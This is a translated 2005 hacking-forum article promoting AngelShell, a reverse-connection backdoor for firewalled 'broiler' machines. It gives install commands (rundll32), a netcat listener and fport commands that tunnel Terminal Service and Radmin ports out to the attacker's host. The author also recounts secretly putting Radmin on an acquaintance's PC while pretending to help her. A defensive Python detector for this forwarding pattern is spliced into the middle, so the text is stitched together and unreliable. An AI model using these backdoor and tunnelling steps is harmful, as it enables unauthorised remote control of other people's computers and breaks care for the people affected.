AngelShell: making every forward-connection program work over a reverse connection (application article) - vulnerability warning - the black bar safety net

Nov 30, 2005 - 12:00 a.m.
Author: 佚名 (Anonymous)
Source: www.myhack58.com

Nowadays servers are almost all placed behind hardware firewalls, which are hard to get through; only once you run into one do you realise what a party pooper a hardware firewall is! Terminal Service, Radmin and the like are out of the question for control. I tried it and found that almost all of them allow reverse connections, while a forward connection only gets through to ports 80 and 21; even 1433 could not be connected. So the reverse-connection backdoors go up, and as soon as one is uploaded the antivirus kills it. Angrily, I dug out Delphi and set about writing a backdoor myself! After a few days the backdoor was finished, and it met my ideal requirements too; it works very nicely, enough to be called the nightmare of hardware firewalls and of broilers (compromised machines) inside internal networks! I daren't keep it to myself, so I am hurrying to share it with everyone.
This program is called AngelShell. Here I use my broiler and my own computer for the test. First you need to configure locally a file describing the reverse-connection information: the first line is your IP, the second line is the port NC is listening on. Once written, put it on some HTTP space, then configure the client: set the password and the HTTP address of the file you just uploaded to your FTP space.
You can choose to generate a DLL server end or an EXE server end. The EXE server end installs itself when run, while the DLL server end has to be installed with the following command: "rundll32 dll-path,I". Remember that the trailing I must be uppercase.

Tip: for everyone's convenience the program's author actually provides only the EXE server end; in essence it too installs the DLL program, the EXE just unpacks it and completes the installation automatically.

Here I will use the DLL server end to illustrate. First transfer the DLL to the beloved broiler, then type at the command line: "rundll32 angel.dll,I". Note that here I am connected to the broiler over FTP, so it is convenient to install directly from the FTP command line.
Once installed, run "nc -v -l -p 7787" on your own machine to listen on port 7787, the port I wrote into the configuration file at the start. After a moment NC displays the incoming information; enter the password, hit Enter, and OK, the connection is established. The help information is displayed and the cute Shell is out.
Tip: this backdoor also provides some additional commands that can be executed directly in the Shell. To avoid conflicts with existing program names, the author made all the additional commands lowercase.

At this point you may think that, apart from being able to generate an EXE server end, this backdoor has nothing special about it. Of course, those features alone are not what makes it distinctive, nor would they count as a hardware firewall's… The backdoor we are using this time not only achieves a reverse connection itself, it also lets all other programs that rely on forward connections work over a reverse connection, such as Terminal Service, Radmin, MSSQL and so on! Oh, don't be surprised, the good part is still to come and it won't disappoint you. Let's GO!
See the Fport command among the Shell's additional commands? That is port forwarding, which can mirror any port of the remote computer back to your local machine. What? You don't get it? Oh, OK, read on and you will. First we test the Windows Terminal Service. I had opened Terminal Service on this broiler before, but the hardware firewall kept intercepting it and I could never connect; today that ends!

Tip: Fport usage:
fport <local port> <Your IP> <YourPort>
Here the parameter local port is the port on the broiler that you want to forward, Your IP is your IP address or host name, and YourPort is the port your client is listening on.

Open the client, fill in 3389 under "port to simulate", and fill in any port under "connect to remote computer port", of course not one that conflicts with a port already open; I used 7788. Then click "start listening". Hurry over to the broiler's Shell and type: "fport 3389 61.187.. 7788". Here 3389 is the broiler's Terminal Service port and 7788 is the port our side uses for the connection to the remote computer. The client then reports that a connection from the remote computer has been received and that you can now connect to local port 3389. So we have moved the broiler's port 3389 onto our own beloved machine.
Friends, what are we waiting for? Open a Terminal Service login client, fill in 127.0.0.1 as the IP and connect; the client immediately shows that a new connection has been established, and the Remote Desktop logon dialog appears. Words cannot express how excited I was!
We then try logging in with two users, and the client again successfully establishes a new connection. It turns out that 2 users logged in at the same time both succeed! Of course you can log in more users if you wish. When programming I set each connection to carry its data over 2 threads, so transmission speed is guaranteed.
While I was immersed in the joy, the phone rang. It turned out to be an MM (a girl) who had bought a camera and wanted me to help her install it; did this really need me to go over? So I called her on QQ, and took the opportunity to test once more. The MM has no hardware firewall, but she is on an internal network, running Windows XP Professional. I simply sent her the EXE server end and told her to run it, then listened locally; after a moment it reported that information had been received and asked for the password. After entering the password I got a Shell, then used the file download function to install Radmin on her machine, insidious enough! Then I typed the following command: "fport 4899 61.187.. 7788", forwarding her port 4899 to my port 4899, then opened Radmin Viewer locally, entering 127.0.0.1 as the IP and leaving the port at the default 4899. Connected successfully!
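On the compromised host the forwarding just described leaves a recognisable footprint: a single process that holds both a loopback connection to the forwarded service (3389 or 4899 here) and an established outbound connection to the operator's listener. The following Python, an added example and not code from the article or from AngelShell, flags that pattern in constructed netstat -ano style output; the PIDs and the 203.0.113.x addresses are made up for the sample.

```python
"""Flag processes that bridge a local service port to an outbound connection,
the footprint AngelShell's fport leaves on the host: one PID holds a loopback
connection to the forwarded service and an outbound connection to the operator.
The input is constructed netstat -ano style text, not a real capture."""
import ipaddress
from collections import defaultdict

SERVICE_PORTS = {3389, 4899, 1433}  # ports the article forwards
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]

def is_external(ip):
    """True when ip is outside loopback, RFC 1918 and link-local ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LOCAL_NETS)

def parse_netstat(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state, pid) for TCP rows."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":  # skip headers and UDP rows
            continue
        lip, lport = parts[1].rsplit(":", 1)
        rip, rport = parts[2].rsplit(":", 1)
        yield lip, int(lport), rip, int(rport), parts[3], int(parts[4])

def find_bridging_pids(text):
    """Return {pid: (service_ports, external_peers)} for PIDs with both an
    ESTABLISHED loopback connection to a service port and an ESTABLISHED
    connection to an external address."""
    to_service, to_external = defaultdict(set), defaultdict(set)
    for _, _, rip, rport, state, pid in parse_netstat(text):
        if state != "ESTABLISHED":
            continue
        if ipaddress.ip_address(rip).is_loopback and rport in SERVICE_PORTS:
            to_service[pid].add(rport)
        elif is_external(rip):
            to_external[pid].add(f"{rip}:{rport}")
    return {pid: (sorted(to_service[pid]), sorted(to_external[pid]))
            for pid in to_service.keys() & to_external.keys()}

# Constructed sample: PID 1488 is the tunnel, 820 the Terminal Service,
# 2204 an ordinary browser; 203.0.113.x are placeholder external hosts.
SAMPLE = """\
  TCP    127.0.0.1:49210        127.0.0.1:3389         ESTABLISHED     1488
  TCP    127.0.0.1:3389         127.0.0.1:49210        ESTABLISHED     820
  TCP    192.168.1.20:49211     203.0.113.5:7788       ESTABLISHED     1488
  TCP    192.168.1.20:49300     203.0.113.9:443        ESTABLISHED     2204
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       820
"""
```

Only PID 1488 is reported, because the Terminal Service itself (820) has no external peer and the browser (2204) has no loopback connection to a service port.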

I helped her open Device Manager and in no time had the camera driver installed; the MM was stunned, not knowing what was going on, ha ha, waiting for her to come round and worship me! She insisted on taking me as her teacher, sweat… The test ends here, and I am happy to mention it, heh!

In theory the program supports any protocol, but because some protocols are special and verify the IP, the desired effect may not be achieved. For example a web server: today I wanted to transfer a broiler's port 80 over and fool someone into thinking I had my own website. The result came up but showed nothing except "No web… in this…", which roughly means there is no web service at this address. That reminded me that the HTTP protocol carries a Host value, which did not match, so no wonder.
Finally, how to use this program when you are on an internal network yourself. You need a broiler that allows forward connections to act as a relay: forward the server end's port to this relay broiler, and then connecting directly to the relay broiler is equivalent to connecting to the server end!
Well, I hope this article can be of help to you; if you have read this far I am very grateful. Finally I wish you always happy, and your technology ever booming!